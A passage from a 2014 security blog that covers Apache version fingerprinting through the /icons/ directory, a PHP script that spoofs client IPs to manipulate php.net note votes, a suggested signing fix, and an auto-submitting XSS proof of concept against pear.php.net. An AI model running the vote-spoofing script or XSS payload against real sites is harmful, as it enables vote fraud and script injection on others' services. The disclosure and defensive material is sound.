Tuesday, April 22, 2014

Apache fingerprinting with icons directory

Sometimes web servers don't return a "Server" header in the HTTP response, or they return a fake value. This doesn't increase security in any way and is a clear example of security through obscurity; nevertheless, some administrators want to hide this information or even change it to some odd value.

If you are one of them and you're running Apache, don't forget about the default /icons/ alias. Anyone can use it to guess that you're running Apache, for example:

http://apache.org/icons/apache_pb.gif

The directory content differs between Apache versions, so it may also reveal which version you are running.

For example, the apache_pb.gif shipped with Apache 2.2 differs from the one shipped with Apache 2.4:

[image: Apache 2.2 icons/apache_pb.gif]

[image: Apache 2.4 icons/apache_pb.gif]

For more differences you can look at the history of the Apache source code repository:
http://svn.apache.org/viewvc/httpd/httpd/trunk/docs/icons/

You can disable this alias in the httpd.conf file by simply commenting out the line:
Alias /icons/ "/var/www/icons/"

Monday, April 21, 2014

Abusing PHP.net "User Contributed Notes" up/down voting system easier

On the php.net website there are "User Contributed Notes" with an up/down vote system. There is a simple abuse-protection mechanism that blocks repeated votes from the same IP address within a short time. Look closer at manual/vote-note.php:
...
$master_url = "http://master.php.net/entry/user-notes-vote.php";
...
$data = array(
              "noteid" => $_REQUEST['id'],
              "sect" => $_REQUEST['page'],
              "vote" => $_REQUEST['vote'],
              "ip" => $_SERVER['REMOTE_ADDR'],
         );
...
... $r = posttohost($master_url, $data) ...
And the posttohost function from include/posttohost.inc:
...
function posttohost($url, $data)
{
    $data = http_build_query($data);

    $opts = array(
        'method'  => 'POST',
        'header'  => 'Content-type: application/x-www-form-urlencoded',
        'content' => $data,
    );

    $ctx = stream_context_create(array('http' => $opts));

    $response_body = @file_get_contents($url, false, $ctx);

    return $response_body;
}
One of the parameters sent to http://master.php.net/entry/user-notes-vote.php is the client IP address, and it can be trivially spoofed: skip php.net/manual/vote-note.php altogether and send the POST request directly to http://master.php.net/entry/user-notes-vote.php (there is no validation, no whitelisting of the request source IP, etc.).

<?php
// demo
$url = 'http://master.php.net/entry/user-notes-vote.php';

$data = array(
    'noteid' => '/*NOTE_ID*/',
    'sect'   => '/*SECT*/',
    'vote'   => '/*VOTE*/',
    'ip'     => '/*SOME_RANDOM_IP*/',
);

$options = array(
   'http' => array(
        'header'  => "Content-type: application/x-www-form-urlencoded\r\n",
        'method'  => 'POST',
        'content' => http_build_query($data),
    ),
);

$context  = stream_context_create($options);
$result = file_get_contents($url, false, $context);

echo $result;
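The missing server-side check, as an added example that is not php.net's code: the frontend signs the forwarded body with a secret shared only with master, and the master endpoint rejects any request whose signature or source address doesn't check out, so a direct POST with a chosen "ip" is dropped before it reaches the vote logic. The header name, the secret handling, the frontend allowlist and the master-side entry point are assumptions; only the shape of posttohost() comes from the code above.

```php
<?php
// Added example (not php.net's code): authenticate the frontend-to-master
// vote forwarding so a direct POST with a spoofed "ip" field is rejected.
// The header name, secret handling and master-side handler are assumptions;
// only the shape of posttohost() comes from the original post.

const VOTE_SIG_HEADER = 'X-Vote-Signature';   // assumed header name

// Frontend side: the original posttohost(), plus an HMAC over the exact
// encoded body, keyed with a secret shared only between frontend and master.
function posttohost_signed($url, array $data, $secret)
{
    $body = http_build_query($data);
    $sig  = hash_hmac('sha256', $body, $secret);

    $opts = array(
        'method'  => 'POST',
        'header'  => "Content-type: application/x-www-form-urlencoded\r\n"
                   . VOTE_SIG_HEADER . ": $sig\r\n",
        'content' => $body,
    );
    $ctx = stream_context_create(array('http' => $opts));
    return @file_get_contents($url, false, $ctx);
}

// Master side: only a known frontend may talk to this endpoint, and the
// signature must match the raw body (constant-time compare). Anything that
// fails never reaches the vote logic, so the "ip" field is always the one
// the trusted frontend observed in its own $_SERVER['REMOTE_ADDR'].
function verify_vote_request($raw_body, $sig_header, $secret,
                             $remote_addr, array $allowed_frontends)
{
    if (!in_array($remote_addr, $allowed_frontends, true)) {
        return false;
    }
    $expected = hash_hmac('sha256', $raw_body, $secret);
    return is_string($sig_header) && hash_equals($expected, $sig_header);
}

// Usage in the (assumed) master entry point:
//   $raw = file_get_contents('php://input');
//   $sig = isset($_SERVER['HTTP_X_VOTE_SIGNATURE'])
//        ? $_SERVER['HTTP_X_VOTE_SIGNATURE'] : null;
//   if (!verify_vote_request($raw, $sig, $secret, $_SERVER['REMOTE_ADDR'], $frontends)) {
//       header('HTTP/1.1 403 Forbidden'); exit;
//   }
//   parse_str($raw, $vote);   // $vote['ip'] can now be trusted for rate limiting
```

Signing alone does not help if the secret ever leaves the two servers; rotating it and keeping the source allowlist as a second check keeps the per-IP rate limit meaningful.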

pear.php.net XSS

A long time ago (28.06.2013) I found an XSS bug in http://pear.php.net/support/lists.php. The email parameter was neither validated nor sanitized, which resulted in XSS. The proof of concept was:
<head>
    <script src="http://code.jquery.com/jquery-1.10.1.min.js"></script>
</head>

<body> 
    <form method="post" action="http://pear.php.net/support/lists.php" id="form" style="display:none">
    <input name="maillist[pear-dev]" type="radio" value="normal" checked>
    <input type="text" name="email" size="30" value="<script>alert('xss');</script>">
    <input type="submit" name="action" value="Subscribe">
    </form>
</body>
 
<script>
     $('input[name=action]').click();
</script>
Fixed 08.07.2013.